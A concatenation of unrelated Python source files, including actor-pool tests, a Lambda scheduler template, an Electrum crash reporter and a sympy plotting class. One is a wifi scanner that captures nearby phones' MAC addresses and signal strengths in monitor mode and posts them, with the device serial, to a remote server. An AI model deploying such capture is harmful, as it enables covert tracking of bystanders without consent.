[-128] + list(range(0, 20, 2)) + list(range(1, 20, 2)) + [127]
)
finally:
self.assertEqual(promise.get_active_promise_count(), 0)
def testTimeoutActor(self):
try:
with create_actor_pool(n_process=1) as pool:
serve_ref = pool.create_actor(ServeActor, uid='ServeActor')
test_ref = pool.create_actor(PromiseTestActor)
test_ref.test_timeout()
wait_test_actor_result(test_ref, 30)
self.assertListEqual(serve_ref.get_result(), [0, 'PromiseTimeout'])
finally:
self.assertEqual(promise.get_active_promise_count(), 0)
def testNoTimeoutActor(self):
try:
with create_actor_pool(n_process=1) as pool:
serve_ref = pool.create_actor(ServeActor, uid='ServeActor')
test_ref = pool.create_actor(PromiseTestActor)
test_ref.test_no_timeout()
wait_test_actor_result(test_ref, 30)
self.assertListEqual(serve_ref.get_result(), [0])
finally:
self.assertEqual(promise.get_active_promise_count(), 0)
def testRefReject(self):
try:
with create_actor_pool(n_process=1) as pool:
serve_ref = pool.create_actor(ServeActor, uid='ServeActor')
test_ref = pool.create_actor(PromiseTestActor)
test_ref.test_ref_reject()
wait_test_actor_result(test_ref, 30)
self.assertListEqual(serve_ref.get_result(), ['WorkerProcessStopped', 0])
finally:
self.assertEqual(promise.get_active_promise_count(), 0)
def testAddrReject(self):
try:
with create_actor_pool(n_process=1) as pool:
serve_ref = pool.create_actor(ServeActor, uid='ServeActor')
test_ref = pool.create_actor(PromiseTestActor)
test_ref.test_addr_reject()
wait_test_actor_result(test_ref, 30)
self.assertListEqual(serve_ref.get_result(), ['WorkerDead', 0])
finally:
self.assertEqual(promise.get_active_promise_count(), 0)
def testClosureRefcount(self):
try:
with create_actor_pool(n_process=1) as pool:
serve_ref = pool.create_actor(ServeActor, uid='ServeActor')
test_ref = pool.create_actor(PromiseTestActor)
test_ref.test_closure_refcount()
wait_test_actor_result(test_ref, 30)
self.assertIsNone(serve_ref.get_result()[-1]())
finally:
self.assertEqual(promise.get_active_promise_count(), 0)
|
app.py
|
# -*- coding: utf-8 -*-
"""Lambda application to process sending sub-minute events to SNS."""
import re
import time
import json
import threading
import boto3
sns = boto3.client('sns')
def set_interval(rate):
seconds = re.search('rate\((\d+) seconds*\)', rate).group(1)
def decorator(function):
def wrapper(*args, **kwargs):
stopped = threading.Event()
def loop(): # executed in another thread
while not stopped.wait(seconds): # until stopped
function(*args, **kwargs)
thread = threading.Thread(target=loop)
thread.daemon = True # stop if the program exits
thread.start()
return stopped
return wrapper
return decorator
def send_message(interval, rate):
return sns.publish(
TopicArn='{{topic_arn}}',
Message=json.dumps({
"default": f"{interval}: {rate}",
}),
MessageStructure='json',
MessageAttributes={
'cron_interval': {
'DataType': 'String',
'StringValue': interval,
},
'cron_rate': {
'DataType': 'String',
'StringValue': rate,
},
},
)
{% for interval, rate in second_intervals.items() %}
@set_interval("{{rate}}")
def {{interval}}(*args, **kwargs):
send_message("""{{interval}}""", """{{rate}}""")
{% endfor %}
def handler(event, context):
time.sleep(59)
|
step_checksum.py
|
"""Batching file prepare requests to our API."""
import collections
import os
import shutil
import threading
import wandb.util
from wandb.filesync import step_upload
RequestUpload = collections.namedtuple(
"RequestUpload",
(
"path",
"save_name",
"artifact_id",
"copy",
"use_prepare_flow",
"save_fn",
"digest",
),
)
RequestStoreManifestFiles = collections.namedtuple(
"RequestStoreManifestFiles", ("manifest", "artifact_id", "save_fn")
)
RequestCommitArtifact = collections.namedtuple(
"RequestCommitArtifact", ("artifact_id", "finalize", "before_commit", "on_commit")
)
RequestFinish = collections.namedtuple("RequestFinish", ())
class StepChecksum(object):
def __init__(self, api, tempdir, request_queue, output_queue, stats):
self._api = api
self._tempdir = tempdir
self._request_queue = request_queue
self._output_queue = output_queue
self._stats = stats
self._thread = threading.Thread(target=self._thread_body)
self._thread.daemon = True
def _thread_body(self):
finished = False
while True:
req = self._request_queue.get()
if isinstance(req, RequestUpload):
path = req.path
if req.copy:
path = os.path.join(
self._tempdir.name,
"%s-%s" % (wandb.util.generate_id(), req.save_name),
)
wandb.util.mkdir_exists_ok(os.path.dirname(path))
try:
# certain linux distros throw an exception when copying
# large files: https://bugs.python.org/issue43743
shutil.copy2(req.path, path)
except OSError:
shutil._USE_CP_SENDFILE = False
shutil.copy2(req.path, path)
checksum = None
if req.use_prepare_flow:
# passing a checksum through indicates that we'd like to use the
# "prepare" file upload flow, in which we prepare the files in
# the database before uploading them. This is currently only
# used for artifact manifests
checksum = wandb.util.md5_file(path)
self._stats.init_file(req.save_name, os.path.getsize(path))
self._output_queue.put(
step_upload.RequestUpload(
path,
req.save_name,
req.artifact_id,
checksum,
req.copy,
req.save_fn,
req.digest,
)
)
elif isinstance(req, RequestStoreManifestFiles):
for entry in req.manifest.entries.values():
if entry.local_path:
# This stupid thing is needed so the closure works correctly.
def make_save_fn_with_entry(save_fn, entry):
return lambda progress_callback: save_fn(
entry, progress_callback
)
self._stats.init_file(
entry.local_path, entry.size, is_artifact_file=True
)
self._output_queue.put(
step_upload.RequestUpload(
entry.local_path,
entry.path,
req.artifact_id,
entry.digest,
False,
make_save_fn_with_entry(req.save_fn, entry),
entry.digest,
)
)
elif isinstance(req, RequestCommitArtifact):
self._output_queue.put(
step_upload.RequestCommitArtifact(
req.artifact_id, req.finalize, req.before_commit, req.on_commit
)
)
elif isinstance(req, RequestFinish):
break
else:
raise Exception("internal error")
self._output_queue.put(step_upload.RequestFinish())
def start(self):
self._thread.start()
def is_alive(self):
return self._thread.is_alive()
def finish(self):
self._request_queue.put(RequestFinish())
|
base_crash_reporter.py
|
# Electrum - lightweight Bitcoin client
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import json
import locale
import traceback
import sys
import queue
from .version import ELECTRUM_VERSION
from . import constants
from .i18n import _
from .util import make_aiohttp_session
from .logging import describe_os_version, Logger, get_git_version
class BaseCrashReporter(Logger):
report_server = "https://chesscoin032.com/"
config_key = "show_crash_reporter"
issue_template = """<h2>Traceback</h2>
<pre>
{traceback}
</pre>
<h2>Additional information</h2>
<ul>
<li>Electrum version: {app_version}</li>
<li>Python version: {python_version}</li>
<li>Operating system: {os}</li>
<li>Wallet type: {wallet_type}</li>
<li>Locale: {locale}</li>
</ul>
"""
CRASH_MESSAGE = _('Something went wrong while executing Electrum.')
CRASH_TITLE = _('Sorry!')
REQUEST_HELP_MESSAGE = _('To help us diagnose and fix the problem, you can send us a bug report that contains '
'useful debug information:')
DESCRIBE_ERROR_MESSAGE = _("Please briefly describe what led to the error (optional):")
ASK_CONFIRM_SEND = _("Do you want to send this report?")
USER_COMMENT_PLACEHOLDER = _("Do not enter sensitive/private information here. "
"The report will be visible on the public issue tracker.")
def __init__(self, exctype, value, tb):
Logger.__init__(self)
self.exc_args = (exctype, value, tb)
def send_report(self, asyncio_loop, proxy, endpoint="/crash", *, timeout=None):
if constants.net.GENESIS[-4:] not in ["4943", "e26f"] and ".electrum.org" in BaseCrashReporter.report_server:
# Gah! Some kind of altcoin wants to send us crash reports.
raise Exception(_("Missing report URL."))
report = self.get_traceback_info()
report.update(self.get_additional_info())
report = json.dumps(report)
coro = self.do_post(proxy, BaseCrashReporter.report_server + endpoint, data=report)
response = asyncio.run_coroutine_threadsafe(coro, asyncio_loop).result(timeout)
return response
async def do_post(self, proxy, url, data):
async with make_aiohttp_session(proxy) as session:
async with session.post(url, data=data, raise_for_status=True) as resp:
return await resp.text()
def get_traceback_info(self):
exc_string = str(self.exc_args[1])
stack = traceback.extract_tb(self.exc_args[2])
readable_trace = self.__get_traceback_str_to_send()
id = {
"file": stack[-1].filename,
"name": stack[-1].name,
"type": self.exc_args[0].__name__
}
return {
"exc_string": exc_string,
"stack": readable_trace,
"id": id
}
def get_additional_info(self):
args = {
"app_version": get_git_version() or ELECTRUM_VERSION,
"python_version": sys.version,
"os": describe_os_version(),
"wallet_type": "unknown",
"locale": locale.getdefaultlocale()[0] or "?",
"description": self.get_user_description()
}
try:
args["wallet_type"] = self.get_wallet_type()
except:
# Maybe the wallet isn't loaded yet
pass
return args
def __get_traceback_str_to_send(self) -> str:
# make sure that traceback sent to crash reporter contains
# e.__context__ and e.__cause__, i.e. if there was a chain of
# exceptions, we want the full traceback for the whole chain.
return "".join(traceback.format_exception(*self.exc_args))
def _get_traceback_str_to_display(self) -> str:
# overridden in Qt subclass
return self.__get_traceback_str_to_send()
def get_report_string(self):
info = self.get_additional_info()
info["traceback"] = self._get_traceback_str_to_display()
return self.issue_template.format(**info)
def get_user_description(self):
raise NotImplementedError
def get_wallet_type(self) -> str:
raise NotImplementedError
class EarlyExceptionsQueue:
"""Helper singleton for explicitly sending exceptions to crash reporter.
Typically the GUIs set up an "exception hook" that catches all otherwise
uncaught exceptions (which unroll the stack of a thread completely).
This class provides methods to report *any* exception, and queueing logic
that delays processing until the exception hook is set up.
"""
_is_exc_hook_ready = False
_exc_queue = queue.Queue()
@classmethod
def set_hook_as_ready(cls):
if cls._is_exc_hook_ready:
return
cls._is_exc_hook_ready = True
while cls._exc_queue.qsize() > 0:
e = cls._exc_queue.get()
cls._send_exception_to_crash_reporter(e)
@classmethod
def send_exception_to_crash_reporter(cls, e: BaseException):
if cls._is_exc_hook_ready:
cls._send_exception_to_crash_reporter(e)
else:
cls._exc_queue.put(e)
@staticmethod
def _send_exception_to_crash_reporter(e: BaseException):
assert EarlyExceptionsQueue._is_exc_hook_ready
sys.excepthook(type(e), e, e.__traceback__)
send_exception_to_crash_reporter = EarlyExceptionsQueue.send_exception_to_crash_reporter
def trigger_crash():
# note: do not change the type of the exception, the message,
# or the name of this method. All reports generated through this
# method will be grouped together by the crash reporter, and thus
# don't spam the issue tracker.
class TestingException(Exception):
pass
def crash_test():
raise TestingException("triggered crash for testing purposes")
import threading
t = threading.Thread(target=crash_test)
t.start()
|
plot_mode_base.py
|
from pyglet.gl import *
from plot_mode import PlotMode
from threading import Thread, Event, RLock
from color_scheme import ColorScheme
from sympy.core.basic import S
from time import sleep
class PlotModeBase(PlotMode):
"""
Intended parent class for plotting
modes. Provides base functionality
in conjunction with its parent,
PlotMode.
"""
##
## Class-Level Attributes
##
"""
The following attributes are meant
to be set at the class level, and serve
as parameters to the plot mode registry
(in PlotMode). See plot_modes.py for
concrete examples.
"""
"""
i_vars
'x' for Cartesian2D
'xy' for Cartesian3D
etc.
d_vars
'y' for Cartesian2D
'r' for Polar
etc.
"""
i_vars, d_vars = '', ''
"""
intervals
Default intervals for each i_var, and in the
same order. Specified [min, max, steps].
No variable can be given (it is bound later).
"""
intervals = []
"""
aliases
A list of strings which can be used to
access this mode.
'cartesian' for Cartesian2D and Cartesian3D
'polar' for Polar
'cylindrical', 'polar' for Cylindrical
Note that _init_mode chooses the first alias
in the list as the mode's primary_alias, which
will be displayed to the end user in certain
contexts.
"""
aliases = []
"""
is_default
Whether to set this mode as the default
for arguments passed to PlotMode() containing
the same number of d_vars as this mode and
at most the same number of i_vars.
"""
is_default = False
"""
All of the above attributes are defined in PlotMode.
The following ones are specific to PlotModeBase.
"""
"""
A list of the render styles. Do not modify.
"""
styles = {'wireframe':1, 'solid':2, 'both':3}
"""
style_override
Always use this style if not blank.
"""
style_override = ''
"""
default_wireframe_color
default_solid_color
Can be used when color is None or being calculated.
Used by PlotCurve and PlotSurface, but not anywhere
in PlotModeBase.
"""
default_wireframe_color = (0.85,0.85,0.85)
default_solid_color = (0.6,0.6,0.9)
default_rot_preset = 'xy'
##
## Instance-Level Attributes
##
## 'Abstract' member functions
def _get_evaluator(self):
if self.use_lambda_eval:
try:
e = self._get_lambda_evaluator()
return e
except:
print ("\nWarning: creating lambda evaluator failed. "
"Falling back on sympy subs evaluator.")
return self._get_sympy_evaluator()
def _get_sympy_evaluator(self):
raise NotImplementedError()
def _get_lambda_evaluator(self):
raise NotImplementedError()
def _on_calculate_verts(self):
raise NotImplementedError()
def _on_calculate_cverts(self):
raise NotImplementedError()
## Base member functions
def __init__(self, *args, **kwargs):
self.verts = []
self.cverts = []
self.bounds = [ [S.Infinity,-S.Infinity,0],[S.Infinity,-S.Infinity,0],[S.Infinity,-S.Infinity,0] ]
self.cbounds = [ [S.Infinity,-S.Infinity,0],[S.Infinity,-S.Infinity,0],[S.Infinity,-S.Infinity,0] ]
self._draw_lock = RLock()
self._calculating_verts = Event()
self._calculating_cverts = Event()
self._calculating_verts_pos = 0.0
self._calculating_verts_len = 0.0
self._calculating_cverts_pos = 0.0
self._calculating_cverts_len = 0.0
self._max_render_stack_size = 3
self._draw_wireframe = [-1]
self._draw_solid = [-1]
self._style = None
self._color = None
self.predraw = []
self.postdraw = []
self.use_lambda_eval = self.options.pop('use_sympy_eval', None) is None
self.style = self.options.pop('style', '')
self.color = self.options.pop('color', 'rainbow')
self.bounds_callback = kwargs.pop('bounds_callback', None)
self._on_calculate()
def synchronized(f):
def w(self, *args, **kwargs):
self._draw_lock.acquire()
try:
r = f(self, *args, **kwargs)
return r
finally:
self._draw_lock.release()
return w
@synchronized
def push_wireframe(self, function):
"""
Push a function which performs gl commands
used to build a display list. (The list is
built outside of the function)
"""
assert callable(function)
self._draw_wireframe.append(function)
if len(self._draw_wireframe) > self._max_render_stack_size:
del self._draw_wireframe[1] # leave marker element
@synchronized
def push_solid(self, function):
"""
Push a function which performs gl commands
used to build a display list. (The list is
built outside of the function)
"""
assert callable(function)
self._draw_solid.append(function)
if len(self._draw_solid) > self._max_render_stack_size:
del self._draw_solid[1] # leave marker element
def _create_display_list(self, function):
dl = glGenLists(1)
glNewList(dl, GL_COMPILE)
function()
glEndList()
return dl
def _render_stack_top(self, render_stack):
top = render_stack[-1]
if top == -1:
return -1 # nothing to display
elif callable(top):
dl = self._create_display_list(top)
render_stack[-1] = (dl, top)
return dl # display newly added list
elif len(top) == 2:
if GL_TRUE == glIsList(top[0]):
return top[0] # display stored list
dl = self._create_display_list(top[1])
render_stack[-1] = (dl, top[1])
return dl # display regenerated list
def _draw_solid_display_list(self, dl):
glPushAttrib(GL_ENABLE_BIT | GL_POLYGON_BIT)
glPolygonMode(GL_FRONT_AND_BACK, GL_FILL)
glCallList(dl)
glPopAttrib()
def _draw_wireframe_display_list(self, dl):
glPushAttrib(GL_ENABLE_BIT | GL_POLYGON_BIT)
glPolygonMode(GL_FRONT_AND_BACK, GL_LINE)
glEnable(GL_POLYGON_OFFSET_LINE)
glPolygonOffset(-0.005, -50.0)
glCallList(dl)
glPopAttrib()
@synchronized
def draw(self):
for f in self.predraw:
if callable(f): f()
if self.style_override:
style = self.styles[self.style_override]
else:
style = self.styles[self._style]
# Draw solid component if style includes solid
if style & 2:
dl = self._render_stack_top(self._draw_solid)
if dl > 0 and GL_TRUE == glIsList(dl):
self._draw_solid_display_list(dl)
# Draw wireframe component if style includes wireframe
if style & 1:
dl = self._render_stack_top(self._draw_wireframe)
if dl > 0 and GL_TRUE == glIsList(dl):
self._draw_wireframe_display_list(dl)
for f in self.postdraw:
if callable(f): f()
def _on_change_color(self, color):
Thread(target=self._calculate_cverts).start()
def _on_calculate(self):
Thread(target=self._calculate_all).start()
def _calculate_all(self):
self._calculate_verts()
self._calculate_cverts()
def _calculate_verts(self):
if self._calculating_verts.isSet(): return
self._calculating_verts.set()
try: self._on_calculate_verts()
finally: self._calculating_verts.clear()
if callable(self.bounds_callback):
self.bounds_callback()
def _calculate_cverts(self):
if self._calculating_verts.isSet(): return
while self._calculating_cverts.isSet():
sleep(0) # wait for previous calculation
self._calculating_cverts.set()
try: self._on_calculate_cverts()
finally: self._calculating_cverts.clear()
def _get_calculating_verts(self):
return self._calculating_verts.isSet()
def _get_calculating_verts_pos(self):
return self._calculating_verts_pos
def _get_calculating_verts_len(self):
return self._calculating_verts_len
def _get_calculating_cverts(self):
return self._calculating_cverts.isSet()
def _get_calculating_cverts_pos(self):
return self._calculating_cverts_pos
def _get_calculating_cverts_len(self):
return self._calculating_cverts_len
## Property handlers
def _get_style(self):
return self._style
@synchronized
def _set_style(self, v):
if v is None: return
if v is '':
step_max = 0
for i in self.intervals:
if i.v_steps is None: continue
step_max = max([step_max, i.v_steps])
v = ['both', 'solid'][step_max > 40]
#try:
assert v in self.styles
if v == self._style: return
self._style = v
#except Exception, e:
#raise Exception(("Style change failed. "
#"Reason: %s is not a valid "
#"style. Use one of %s.") %
#(str(v), ', '.join(self.styles.iterkeys())))
def _get_color(self):
return self._color
@synchronized
def _set_color(self, v):
try:
if v is not None:
if isinstance(v, (list, tuple)):
v = ColorScheme(*v)
else: v = ColorScheme(v)
if repr(v) == repr(self._color): return
self._on_change_color(v)
self._color = v
except Exception, e:
raise Exception(("Color change failed. "
"Reason: %s" % (str(e))))
style = property(_get_style, _set_style)
color = property(_get_color, _set_color)
calculating_verts = property(_get_calculating_verts)
calculating_verts_pos = property(_get_calculating_verts_pos)
calculating_verts_len = property(_get_calculating_verts_len)
calculating_cverts = property(_get_calculating_cverts)
calculating_cverts_pos = property(_get_calculating_cverts_pos)
calculating_cverts_len = property(_get_calculating_cverts_len)
## String representations
def __str__(self):
f = ", ".join(str(d) for d in self.d_vars)
o = "'mode=%s'" % (self.primary_alias)
return ", ".join([f, o])
def __repr__(self):
f = ", ".join(str(d) for d in self.d_vars)
i = ", ".join(str(i) for i in self.intervals)
d = [ ( 'mode', self.primary_alias ),
( 'color', str(self.color) ),
( 'style', str(self.style) ) ]
o = "'%s'" % (("; ".join("%s=%s" % (k,v)
for k,v in d if v != 'None')))
return ", ".join([f, i, o])
|
__main__.py
|
import threading
import sys
import os
import os.path
import platform
import subprocess
import json
import time
import requests
import logging
import netifaces
import click
from wifi_scanner.oui import load_dictionary, download_oui
from wifi_scanner.analysis import analyze_file
from wifi_scanner.colors import *
def getserial():
# Extract serial from cpuinfo file
cpuserial = "0000000000000000"
try:
f = open('/proc/cpuinfo','r')
for line in f:
if line[0:6]=='Serial':
cpuserial = line[10:26]
f.close()
except:
cpuserial = "ERROR000000000"
return cpuserial
SERIAL = getserial()
SEND_BUFFER = []
IOT_URL = 'http://games.protospace.ca:5000/wifi-scan'
if os.name != 'nt':
from pick import pick
import curses
def which(program):
"""Determines whether program exists
"""
def is_exe(fpath):
return os.path.isfile(fpath) and os.access(fpath, os.X_OK)
fpath, fname = os.path.split(program)
if fpath:
if is_exe(program):
return program
else:
for path in os.environ["PATH"].split(os.pathsep):
path = path.strip('"')
exe_file = os.path.join(path, program)
if is_exe(exe_file):
return exe_file
raise
def showTimer(timeleft):
"""Shows a countdown timer"""
total = int(timeleft) * 10
for i in range(total):
sys.stdout.write('\r')
# the exact output you're looking for:
timeleft_string = '%ds left' % int((total - i + 1) / 10)
if (total - i + 1) > 600:
timeleft_string = '%dmin %ds left' % (
int((total - i + 1) / 600), int((total - i + 1) / 10 % 60))
sys.stdout.write("[%-50s] %d%% %15s" %
('=' * int(50.5 * i / total), 101 * i / total, timeleft_string))
sys.stdout.flush()
time.sleep(0.1)
print("")
def fileToMacSet(path):
with open(path, 'r') as f:
maclist = f.readlines()
return set([x.strip() for x in maclist])
def scan(adapter, scantime, verbose, dictionary, number, nearby, jsonprint, out, allmacaddresses, manufacturers, nocorrection, sort, targetmacs, pcap):
"""Monitor wifi signals to count the number of people around you"""
# print("OS: " + os.name)
# print("Platform: " + platform.system())
if (not os.path.isfile(dictionary)) or (not os.access(dictionary, os.R_OK)):
download_oui(dictionary)
oui = load_dictionary(dictionary)
if not oui:
print('couldn\'t load [%s]' % dictionary)
sys.exit(1)
try:
tshark = which("tshark")
except:
if platform.system() != 'Darwin':
print('tshark not found, install using\n\napt-get install tshark\n')
else:
print('wireshark not found, install using: \n\tbrew install wireshark')
print(
'you may also need to execute: \n\tbrew cask install wireshark-chmodbpf')
sys.exit(1)
if jsonprint:
number = True
if number:
verbose = False
if not pcap:
if len(adapter) == 0:
if os.name == 'nt':
print('You must specify the adapter with -a ADAPTER')
print('Choose from the following: ' +
', '.join(netifaces.interfaces()))
sys.exit(1)
title = 'Please choose the adapter you want to use: '
try:
adapter, index = pick(netifaces.interfaces(), title)
except curses.error as e:
print('Please check your $TERM settings: %s' % (e))
sys.exit(1)
print("Using %s adapter and scanning for %s seconds..." %
(adapter, scantime))
if not number:
# Start timer
t1 = threading.Thread(target=showTimer, args=(scantime,))
t1.daemon = True
t1.start()
dump_file = '/tmp/tshark-temp'
# Scan with tshark
command = [tshark, '-I', '-i', adapter, '-a',
'duration:' + scantime, '-w', dump_file]
if verbose:
print(' '.join(command))
run_tshark = subprocess.Popen(
command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, nothing = run_tshark.communicate()
if not number:
t1.join()
else:
dump_file = pcap
# Read tshark output
command = [
tshark, '-r',
dump_file, '-T',
'fields', '-e',
'wlan.sa', '-e',
'wlan.bssid', '-e',
'radiotap.dbm_antsignal'
]
if verbose:
print(' '.join(command))
run_tshark = subprocess.Popen(
command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
output, nothing = run_tshark.communicate()
# read target MAC address
targetmacset = set()
if targetmacs != '':
targetmacset = fileToMacSet(targetmacs)
foundMacs = {}
for line in output.decode('utf-8').split('\n'):
if verbose:
print(line)
if line.strip() == '':
continue
mac = line.split()[0].strip().split(',')[0]
dats = line.split()
if len(dats) == 3:
if ':' not in dats[0] or len(dats) != 3:
continue
if mac not in foundMacs:
foundMacs[mac] = []
dats_2_split = dats[2].split(',')
if len(dats_2_split) > 1:
rssi = float(dats_2_split[0]) / 2 + float(dats_2_split[1]) / 2
else:
rssi = float(dats_2_split[0])
foundMacs[mac].append(rssi)
if not foundMacs:
print("Found no signals, are you sure %s supports monitor mode?" % adapter)
sys.exit(1)
for key, value in foundMacs.items():
foundMacs[key] = float(sum(value)) / float(len(value))
# Find target MAC address in foundMacs
if targetmacset:
sys.stdout.write(RED)
for mac in foundMacs:
if mac in targetmacset:
print("Found MAC address: %s" % mac)
print("rssi: %s" % str(foundMacs[mac]))
sys.stdout.write(RESET)
if manufacturers:
f = open(manufacturers,'r')
cellphone = [line.rstrip('\n') for line in f.readlines()]
f.close()
else:
cellphone = [
'Motorola Mobility LLC, a Lenovo Company',
'GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD',
'Huawei Symantec Technologies Co.,Ltd.',
'Microsoft',
'HTC Corporation',
'Samsung Electronics Co.,Ltd',
'SAMSUNG ELECTRO-MECHANICS(THAILAND)',
'BlackBerry RTS',
'LG ELECTRONICS INC',
'Apple, Inc.',
'LG Electronics',
'OnePlus Tech (Shenzhen) Ltd',
'Xiaomi Communications Co Ltd',
'LG Electronics (Mobile Communications)']
cellphone_people = []
for mac in foundMacs:
oui_id = 'Not in OUI'
if mac[:8] in oui:
oui_id = oui[mac[:8]]
if verbose:
print(mac, oui_id, oui_id in cellphone)
if allmacaddresses or oui_id in cellphone:
if not nearby or (nearby and foundMacs[mac] > -70):
cellphone_people.append(
{'company': oui_id, 'rssi': foundMacs[mac], 'mac': mac})
if sort:
cellphone_people.sort(key=lambda x: x['rssi'], reverse=True)
if verbose:
print(json.dumps(cellphone_people, indent=2))
# US / Canada: https://twitter.com/conradhackett/status/701798230619590656
percentage_of_people_with_phones = 0.7
if nocorrection:
percentage_of_people_with_phones = 1
num_people = int(round(len(cellphone_people) /
percentage_of_people_with_phones))
if number and not jsonprint:
print(num_people)
elif jsonprint:
print(json.dumps(cellphone_people, indent=2))
else:
if num_people == 0:
print("No one around (not even you!).")
elif num_people == 1:
print("No one around, but you.")
else:
print("There are about %d people around." % num_people)
if out:
with open(out, 'a') as f:
data_dump = {'cellphones': cellphone_people, 'time': time.time()}
f.write(json.dumps(data_dump) + "\n")
if verbose:
print("Wrote %d records to %s" % (len(cellphone_people), out))
if not pcap:
os.remove(dump_file)
results = {
'records': cellphone_people,
'time': int(time.time()),
'serial': SERIAL,
}
return adapter, results
@click.command()
@click.option('-a', '--adapter', default='', help='adapter to use')
def main(adapter):
scantime = '60'
verbose = False
dictionary = 'oui.txt'
number = True
nearby = False
jsonprint = False
out = ''
allmacaddresses = True
manufacturers = ''
nocorrection = True
sort = False
targetmacs = ''
pcap = ''
while True:
adapter, results = scan(adapter, scantime, verbose, dictionary, number,
nearby, jsonprint, out, allmacaddresses, manufacturers,
nocorrection, sort, targetmacs, pcap)
SEND_BUFFER.append(results)
try:
while len(SEND_BUFFER):
r = requests.post(IOT_URL, json=SEND_BUFFER[0], timeout=5)
r.raise_for_status()
SEND_BUFFER.pop(0)
except:
logging.exception('Problem sending to server:')
if __name__ == '__main__':
main()
|
connection.py
|
# Copyright (c) 2015 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import Queue
import threading
import traceback
from ovs.db import idl
from ovs import poller
from neutron.agent.ovsdb.native import idlutils
class TransactionQueue(Queue.Queue, object):
def __init__(self, *args, **kwargs):
super(TransactionQueue, self).__init__(*args, **kwargs)
alertpipe = os.pipe()
self.alertin = os.fdopen(alertpipe[0], 'r', 0)
self.alertout = os.fdopen(alertpipe[1], 'w', 0)
def get_nowait(self, *args, **kwargs):
try:
result = super(TransactionQueue, self).get_nowait(*args, **kwargs)
except Queue.Empty:
return None
self.alertin.read(1)
return result
def put(self, *args, **kwargs):
super(TransactionQueue, self).put(*args, **kwargs)
self.alertout.write('X')
self.alertout.flush()
@property
def alert_fileno(self):
return self.alertin.fileno()
class Connection(object):
def __init__(self, connection, timeout):
self.idl = None
self.connection = connection
self.timeout = timeout
self.txns = TransactionQueue(1)
self.lock = threading.Lock()
def start(self):
with self.lock:
if self.idl is not None:
return
helper = idlutils.get_schema_helper(self.connection)
helper.register_all()
self.idl = idl.Idl(self.connection, helper)
idlutils.wait_for_change(self.idl, self.timeout)
self.poller = poller.Poller()
self.thread = threading.Thread(target=self.run)
self.thread.setDaemon(True)
self.thread.start()
def run(self):
while True:
self.idl.wait(self.poller)
self.poller.fd_wait(self.txns.alert_fileno, poller.POLLIN)
self.poller.block()
self.idl.run()
txn = self.txns.get_nowait()
if txn is not None:
try:
txn.results.put(txn.do_commit())
except Exception as ex:
er = idlutils.ExceptionResult(ex=ex,
tb=traceback.format_exc())
txn.results.put(er)
self.txns.task_done()
def queue_txn(self, txn):
self.txns.put(txn)
|
vec_envs.py
|
import numpy as np
from gym import spaces
# from . import VecEnv
from collections import OrderedDict
from abc import ABC, abstractmethod
import gym
import cloudpickle
import multiprocessing
import pickle
class VecEnv(ABC):
"""
An abstract asynchronous, vectorized environment.
Used to batch data from multiple copies of an environment, so that
each observation becomes an batch of observations, and expected action is a batch of actions to
be applied per-environment.
"""
closed = False
viewer = None
def __init__(self, num_envs, observation_space, action_space):
self.num_envs = num_envs
self.observation_space = observation_space
self.action_space = action_space
@abstractmethod
def reset(self):
"""
Reset all the environments and return an array of
observations, or a dict of observation arrays.
If step_async is still doing work, that work will
be cancelled and step_wait() should not be called
until step_async() is invoked again.
"""
pass
@abstractmethod
def step_async(self, actions):
"""
Tell all the environments to start taking a step
with the given actions.
Call step_wait() to get the results of the step.
You should not call this if a step_async run is
already pending.
"""
pass
@abstractmethod
def step_wait(self):
"""
Wait for the step taken with step_async().
Returns (obs, rews, dones, infos):
- obs: an array of observations, or a dict of
arrays of observations.
- rews: an array of rewards
- dones: an array of "episode done" booleans
- infos: a sequence of info objects
"""
pass
def close_extras(self):
"""
Clean up the extra resources, beyond what's in this base class.
Only runs when not self.closed.
"""
pass
def close(self):
if self.closed:
return
if self.viewer is not None:
self.viewer.close()
self.close_extras()
self.closed = True
def step(self, actions):
"""
Step the environments synchronously.
This is available for backwards compatibility.
"""
self.step_async(actions)
return self.step_wait()
def render(self, mode='human'):
imgs = self.get_images()
bigimg = tile_images(imgs)
if mode == 'human':
self.get_viewer().imshow(bigimg)
return self.get_viewer().isopen
elif mode == 'rgb_array':
return bigimg
else:
raise NotImplementedError
def get_images(self):
"""
Return RGB images from each environment
"""
raise NotImplementedError
@property
def unwrapped(self):
if isinstance(self, VecEnvWrapper):
return self.venv.unwrapped
else:
return self
def get_viewer(self):
if self.viewer is None:
from gym.envs.classic_control import rendering
self.viewer = rendering.SimpleImageViewer()
return self.viewer
class DummyVecEnv(VecEnv):
"""
VecEnv that does runs multiple environments sequentially, that is,
the step and reset commands are send to one environment at a time.
Useful when debugging and when num_env == 1 (in the latter case,
avoids communication overhead)
"""
def __init__(self, env_fns):
"""
Arguments:
env_fns: iterable of callables functions that build environments
"""
self.envs = [fn() for fn in env_fns]
env = self.envs[0]
VecEnv.__init__(self, len(env_fns), env.observation_space, env.action_space)
obs_space = env.observation_space
if isinstance(obs_space, spaces.MultiDiscrete):
